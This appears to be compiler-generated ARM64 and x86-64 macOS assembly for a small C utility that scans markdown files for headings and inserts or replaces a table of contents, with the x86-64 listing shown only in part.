| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/12653.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _getentry ; -- Begin function getentry
.p2align 2
_getentry: ; @getentry
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
adrp x8, _getentry.buf@PAGE
add x8, x8, _getentry.buf@PAGEOFF
str x8, [sp]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
b LBB0_7
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #32
cset w8, lt
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
add x9, x8, #1
str x9, [sp, #8]
ldrb w8, [x8]
ldr x9, [sp]
add x10, x9, #1
str x10, [sp]
strb w8, [x9]
b LBB0_6
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_7:
ldr x8, [sp]
strb wzr, [x8]
adrp x0, _getentry.buf@PAGE
add x0, x0, _getentry.buf@PAGEOFF
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _getref ; -- Begin function getref
.p2align 2
_getref: ; @getref
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
adrp x8, _getref.buf@PAGE
add x8, x8, _getref.buf@PAGEOFF
str x8, [sp]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2:
b LBB1_14
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
ldr x9, [sp]
add x8, x9, #1
str x8, [sp]
mov w8, #45
strb w8, [x9]
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB1_13
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #48
cset w8, lt
tbnz w8, #0, LBB1_8
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #57
cset w8, gt
tbnz w8, #0, LBB1_8
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
add x9, x8, #1
str x9, [sp, #8]
ldrb w8, [x8]
ldr x9, [sp]
add x10, x9, #1
str x10, [sp]
strb w8, [x9]
b LBB1_12
LBB1_8: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
ldrsb w8, [x8]
subs w8, w8, #65
cset w8, ge
tbnz w8, #0, LBB1_10
b LBB1_9
LBB1_9: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB1_11
LBB1_10: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #8]
ldrsb w0, [x8]
bl _tolower
ldr x8, [sp]
strb w0, [x8]
ldr x8, [sp]
add x8, x8, #1
str x8, [sp]
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB1_11
LBB1_11: ; in Loop: Header=BB1_1 Depth=1
b LBB1_12
LBB1_12: ; in Loop: Header=BB1_1 Depth=1
b LBB1_13
LBB1_13: ; in Loop: Header=BB1_1 Depth=1
b LBB1_1
LBB1_14:
ldr x8, [sp]
strb wzr, [x8]
adrp x0, _getref.buf@PAGE
add x0, x0, _getref.buf@PAGEOFF
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _add_toc ; -- Begin function add_toc
.p2align 2
_add_toc: ; @add_toc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
str x1, [sp, #16]
adrp x8, _toc_cnt@PAGE
ldr w8, [x8, _toc_cnt@PAGEOFF]
subs w8, w8, #512
cset w8, lt
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
b LBB2_3
LBB2_2:
adrp x8, _toc_cnt@PAGE
str x8, [sp, #8] ; 8-byte Folded Spill
ldrsw x9, [x8, _toc_cnt@PAGEOFF]
adrp x8, _toc@GOTPAGE
ldr x8, [x8, _toc@GOTPAGEOFF]
str x8, [sp] ; 8-byte Folded Spill
add x0, x8, x9, lsl #10
ldr x1, [sp, #16]
mov x2, #1024
mov x3, #-1
bl ___strncpy_chk
ldr x8, [sp] ; 8-byte Folded Reload
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldrsw x10, [x9, _toc_cnt@PAGEOFF]
add x8, x8, x10, lsl #10
strb wzr, [x8, #1023]
ldur w8, [x29, #-4]
ldrsw x11, [x9, _toc_cnt@PAGEOFF]
adrp x10, _toc_level@GOTPAGE
ldr x10, [x10, _toc_level@GOTPAGEOFF]
str w8, [x10, x11, lsl #2]
ldr w8, [x9, _toc_cnt@PAGEOFF]
add w8, w8, #1
str w8, [x9, _toc_cnt@PAGEOFF]
b LBB2_3
LBB2_3:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _read_md_fp ; -- Begin function read_md_fp
.p2align 2
_read_md_fp: ; @read_md_fp
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur wzr, [x29, #-28]
mov w8, #1
str w8, [sp, #32]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldur x2, [x29, #-8]
adrp x0, _read_md_fp.buf@PAGE
add x0, x0, _read_md_fp.buf@PAGEOFF
mov w1, #1024
bl _fgets
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_3
b LBB3_2
LBB3_2:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-28]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_7
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
str x8, [sp, #24] ; 8-byte Folded Spill
adrp x0, _toc_end@PAGE
add x0, x0, _toc_end@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _strlen
ldr x1, [sp, #16] ; 8-byte Folded Reload
mov x2, x0
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB3_6
b LBB3_5
LBB3_5: ; in Loop: Header=BB3_1 Depth=1
stur wzr, [x29, #-28]
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
b LBB3_23
LBB3_7: ; in Loop: Header=BB3_1 Depth=1
adrp x8, _read_md_fp.buf@PAGE
ldrsb w8, [x8, _read_md_fp.buf@PAGEOFF]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_9
b LBB3_8
LBB3_8: ; in Loop: Header=BB3_1 Depth=1
adrp x8, _read_md_fp.buf@PAGE
ldrsb w8, [x8, _read_md_fp.buf@PAGEOFF]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB3_12
b LBB3_9
LBB3_9: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #32]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB3_11
b LBB3_10
LBB3_10: ; in Loop: Header=BB3_1 Depth=1
ldur x1, [x29, #-16]
adrp x0, _read_md_fp.buf@PAGE
add x0, x0, _read_md_fp.buf@PAGEOFF
bl _fputs
b LBB3_11
LBB3_11: ; in Loop: Header=BB3_1 Depth=1
b LBB3_22
LBB3_12: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
str x8, [sp, #8] ; 8-byte Folded Spill
adrp x0, _toc_start@PAGE
add x0, x0, _toc_start@PAGEOFF
str x0, [sp] ; 8-byte Folded Spill
bl _strlen
ldr x1, [sp] ; 8-byte Folded Reload
mov x2, x0
ldr x0, [sp, #8] ; 8-byte Folded Reload
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB3_14
b LBB3_13
LBB3_13: ; in Loop: Header=BB3_1 Depth=1
adrp x9, _existing_toc_found@PAGE
mov w8, #1
str w8, [x9, _existing_toc_found@PAGEOFF]
stur w8, [x29, #-28]
b LBB3_21
LBB3_14: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-24]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov x2, #2
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB3_16
b LBB3_15
LBB3_15: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #32]
ldur x8, [x29, #-24]
add x1, x8, #2
mov w0, #1
bl _add_toc
ldur x1, [x29, #-16]
adrp x0, _read_md_fp.buf@PAGE
add x0, x0, _read_md_fp.buf@PAGEOFF
bl _fputs
b LBB3_20
LBB3_16: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-24]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
mov x2, #3
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB3_18
b LBB3_17
LBB3_17: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #32]
ldur x8, [x29, #-24]
add x1, x8, #3
mov w0, #2
bl _add_toc
ldur x1, [x29, #-16]
adrp x0, _read_md_fp.buf@PAGE
add x0, x0, _read_md_fp.buf@PAGEOFF
bl _fputs
b LBB3_19
LBB3_18: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #32]
ldur x1, [x29, #-16]
adrp x0, _read_md_fp.buf@PAGE
add x0, x0, _read_md_fp.buf@PAGEOFF
bl _fputs
b LBB3_19
LBB3_19: ; in Loop: Header=BB3_1 Depth=1
b LBB3_20
LBB3_20: ; in Loop: Header=BB3_1 Depth=1
b LBB3_21
LBB3_21: ; in Loop: Header=BB3_1 Depth=1
b LBB3_22
LBB3_22: ; in Loop: Header=BB3_1 Depth=1
b LBB3_23
LBB3_23: ; in Loop: Header=BB3_1 Depth=1
b LBB3_1
.cfi_endproc
; -- End function
.globl _read_md ; -- Begin function read_md
.p2align 2
_read_md: ; @read_md
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
ldur x0, [x29, #-8]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fopen
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldur x0, [x29, #-8]
bl _perror
b LBB4_5
LBB4_2:
ldr x0, [sp, #16]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
str x0, [sp]
ldr x8, [sp]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_4
b LBB4_3
LBB4_3:
ldr x0, [sp, #16]
bl _perror
b LBB4_5
LBB4_4:
ldr x0, [sp, #8]
ldr x1, [sp]
bl _read_md_fp
ldr x0, [sp, #8]
bl _fclose
ldr x0, [sp]
bl _fclose
b LBB4_5
LBB4_5:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _copy_to_md_fp ; -- Begin function copy_to_md_fp
.p2align 2
_copy_to_md_fp: ; @copy_to_md_fp
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x0, [x29, #-16]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
stur x1, [x29, #-40] ; 8-byte Folded Spill
bl _fprintf
ldur x0, [x29, #-16]
mov x9, sp
adrp x8, _toc_start@PAGE
add x8, x8, _toc_start@PAGEOFF
str x8, [x9]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fprintf
ldur x1, [x29, #-40] ; 8-byte Folded Reload
ldur x0, [x29, #-16]
bl _fprintf
stur wzr, [x29, #-28]
b LBB5_1
LBB5_1: ; =>This Loop Header: Depth=1
; Child Loop BB5_3 Depth 2
ldur w8, [x29, #-28]
adrp x9, _toc_cnt@PAGE
ldr w9, [x9, _toc_cnt@PAGEOFF]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_8
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
stur wzr, [x29, #-32]
b LBB5_3
LBB5_3: ; Parent Loop BB5_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-32]
ldursw x10, [x29, #-28]
adrp x9, _toc_level@GOTPAGE
ldr x9, [x9, _toc_level@GOTPAGEOFF]
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_6
b LBB5_4
LBB5_4: ; in Loop: Header=BB5_3 Depth=2
ldur x0, [x29, #-16]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fprintf
b LBB5_5
LBB5_5: ; in Loop: Header=BB5_3 Depth=2
ldur w8, [x29, #-32]
add w8, w8, #1
stur w8, [x29, #-32]
b LBB5_3
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
ldur x8, [x29, #-16]
str x8, [sp, #48] ; 8-byte Folded Spill
ldursw x9, [x29, #-28]
adrp x8, _toc@GOTPAGE
ldr x8, [x8, _toc@GOTPAGEOFF]
str x8, [sp, #32] ; 8-byte Folded Spill
add x0, x8, x9, lsl #10
bl _getentry
ldr x8, [sp, #32] ; 8-byte Folded Reload
str x0, [sp, #40] ; 8-byte Folded Spill
ldursw x9, [x29, #-28]
add x0, x8, x9, lsl #10
bl _getref
ldr x10, [sp, #40] ; 8-byte Folded Reload
mov x8, x0
ldr x0, [sp, #48] ; 8-byte Folded Reload
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
b LBB5_7
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB5_1
LBB5_8:
ldur x0, [x29, #-16]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
str x1, [sp, #24] ; 8-byte Folded Spill
bl _fprintf
ldur x0, [x29, #-16]
mov x9, sp
adrp x8, _toc_end@PAGE
add x8, x8, _toc_end@PAGEOFF
str x8, [x9]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fprintf
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldur x0, [x29, #-16]
bl _fprintf
b LBB5_9
LBB5_9: ; =>This Inner Loop Header: Depth=1
ldur x2, [x29, #-8]
adrp x0, _copy_to_md_fp.buf@PAGE
add x0, x0, _copy_to_md_fp.buf@PAGEOFF
mov w1, #1024
bl _fgets
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB5_11
b LBB5_10
LBB5_10:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
LBB5_11: ; in Loop: Header=BB5_9 Depth=1
ldur x1, [x29, #-16]
adrp x0, _copy_to_md_fp.buf@PAGE
add x0, x0, _copy_to_md_fp.buf@PAGEOFF
bl _fputs
b LBB5_9
.cfi_endproc
; -- End function
.globl _copy_to_md ; -- Begin function copy_to_md
.p2align 2
_copy_to_md: ; @copy_to_md
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
ldur x0, [x29, #-8]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fopen
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_2
b LBB6_1
LBB6_1:
ldur x0, [x29, #-8]
bl _perror
b LBB6_5
LBB6_2:
ldr x0, [sp, #16]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
str x0, [sp]
ldr x8, [sp]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_4
b LBB6_3
LBB6_3:
ldr x0, [sp, #16]
bl _perror
b LBB6_5
LBB6_4:
ldr x0, [sp, #8]
ldr x1, [sp]
bl _copy_to_md_fp
ldr x0, [sp, #8]
bl _fclose
ldr x0, [sp]
bl _fclose
b LBB6_5
LBB6_5:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
ldur w8, [x29, #-8]
subs w8, w8, #1
cset w8, gt
tbnz w8, #0, LBB7_2
b LBB7_1
LBB7_1:
ldur x8, [x29, #-16]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-4]
b LBB7_20
LBB7_2:
ldur x8, [x29, #-16]
add x8, x8, #8
stur x8, [x29, #-16]
b LBB7_3
LBB7_3: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-16]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_19
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_3 Depth=1
adrp x8, _toc_cnt@PAGE
str x8, [sp, #24] ; 8-byte Folded Spill
str wzr, [x8, _toc_cnt@PAGEOFF]
adrp x8, _existing_toc_found@PAGE
str wzr, [x8, _existing_toc_found@PAGEOFF]
ldur x8, [x29, #-16]
ldr x0, [x8]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _read_md
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr w8, [x8, _toc_cnt@PAGEOFF]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_6
b LBB7_5
LBB7_5: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x1, [x8]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _copy_to_md
b LBB7_6
LBB7_6: ; in Loop: Header=BB7_3 Depth=1
adrp x8, _toc_cnt@PAGE
ldr w8, [x8, _toc_cnt@PAGEOFF]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB7_8
b LBB7_7
LBB7_7: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
b LBB7_18
LBB7_8: ; in Loop: Header=BB7_3 Depth=1
adrp x8, _existing_toc_found@PAGE
ldr w8, [x8, _existing_toc_found@PAGEOFF]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB7_13
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_3 Depth=1
adrp x8, _toc_cnt@PAGE
ldr w8, [x8, _toc_cnt@PAGEOFF]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB7_11
b LBB7_10
LBB7_10: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x10, [x8]
adrp x8, _toc_cnt@PAGE
ldr w9, [x8, _toc_cnt@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
b LBB7_12
LBB7_11: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x10, [x8]
adrp x8, _toc_cnt@PAGE
ldr w9, [x8, _toc_cnt@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
b LBB7_12
LBB7_12: ; in Loop: Header=BB7_3 Depth=1
b LBB7_17
LBB7_13: ; in Loop: Header=BB7_3 Depth=1
adrp x8, _toc_cnt@PAGE
ldr w8, [x8, _toc_cnt@PAGEOFF]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB7_15
b LBB7_14
LBB7_14: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x10, [x8]
adrp x8, _toc_cnt@PAGE
ldr w9, [x8, _toc_cnt@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
b LBB7_16
LBB7_15: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
ldr x10, [x8]
adrp x8, _toc_cnt@PAGE
ldr w9, [x8, _toc_cnt@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
b LBB7_16
LBB7_16: ; in Loop: Header=BB7_3 Depth=1
b LBB7_17
LBB7_17: ; in Loop: Header=BB7_3 Depth=1
b LBB7_18
LBB7_18: ; in Loop: Header=BB7_3 Depth=1
ldur x8, [x29, #-16]
add x8, x8, #8
stur x8, [x29, #-16]
b LBB7_3
LBB7_19:
stur wzr, [x29, #-4]
b LBB7_20
LBB7_20:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _toc_start ; @toc_start
_toc_start:
.asciz "[tocstart]: # (toc start)"
.globl _toc_end ; @toc_end
_toc_end:
.asciz "[tocend]: # (toc end)"
.globl _toc_cnt ; @toc_cnt
.zerofill __DATA,__common,_toc_cnt,4,2
.globl _existing_toc_found ; @existing_toc_found
.zerofill __DATA,__common,_existing_toc_found,4,2
.zerofill __DATA,__bss,_getentry.buf,1024,0 ; @getentry.buf
.zerofill __DATA,__bss,_getref.buf,1024,0 ; @getref.buf
.comm _toc,524288,0 ; @toc
.comm _toc_level,2048,2 ; @toc_level
.zerofill __DATA,__bss,_read_md_fp.buf,1024,0 ; @read_md_fp.buf
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "# "
l_.str.1: ; @.str.1
.asciz "## "
l_.str.2: ; @.str.2
.asciz "r"
l_.str.3: ; @.str.3
.asciz "w"
.zerofill __DATA,__bss,_copy_to_md_fp.buf,1024,0 ; @copy_to_md_fp.buf
l_.str.4: ; @.str.4
.asciz "\n"
l_.str.5: ; @.str.5
.asciz "%s\n"
l_.str.6: ; @.str.6
.asciz " "
l_.str.7: ; @.str.7
.asciz "* [%s](#%s)\n"
l_.str.8: ; @.str.8
.asciz "%s [markdown files]\n"
l_.str.9: ; @.str.9
.asciz "tmp.md"
l_.str.10: ; @.str.10
.asciz "%s: nothing changed (no headings found)\n"
l_.str.11: ; @.str.11
.asciz "%s: added %d toc entry\n"
l_.str.12: ; @.str.12
.asciz "%s: added %d toc entries\n"
l_.str.13: ; @.str.13
.asciz "%s: replaced %d toc entry\n"
l_.str.14: ; @.str.14
.asciz "%s: replaced %d toc entries\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _getentry ## -- Begin function getentry
.p2align 4, 0x90
_getentry: ## @getentry
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
leaq _getentry.buf(%rip), %rax
movq %rax, -16(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB0_3
## %bb.2:
jmp LBB0_7
LBB0_3: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $32, %eax
jl LBB0_5
## %bb.4: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
movb (%rax), %cl
movq -16(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -16(%rbp)
movb %cl, (%rax)
jmp LBB0_6
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_7:
movq -16(%rbp), %rax
movb $0, (%rax)
leaq _getentry.buf(%rip), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _getref ## -- Begin function getref
.p2align 4, 0x90
_getref: ## @getref
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
leaq _getref.buf(%rip), %rax
movq %rax, -16(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_3
## %bb.2:
jmp LBB1_14
LBB1_3: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $32, %eax
jne LBB1_5
## %bb.4: ## in Loop: Header=BB1_1 Depth=1
movq -16(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -16(%rbp)
movb $45, (%rax)
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
jmp LBB1_13
LBB1_5: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $48, %eax
jl LBB1_8
## %bb.6: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $57, %eax
jg LBB1_8
## %bb.7: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
movb (%rax), %cl
movq -16(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -16(%rbp)
movb %cl, (%rax)
jmp LBB1_12
LBB1_8: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
cmpl $65, %eax
jge LBB1_10
## %bb.9: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
jmp LBB1_11
LBB1_10: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %edi
callq _tolower
movb %al, %cl
movq -16(%rbp), %rax
movb %cl, (%rax)
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
LBB1_11: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_12
LBB1_12: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_13
LBB1_13: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_1
LBB1_14:
movq -16(%rbp), %rax
movb $0, (%rax)
leaq _getref.buf(%rip), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
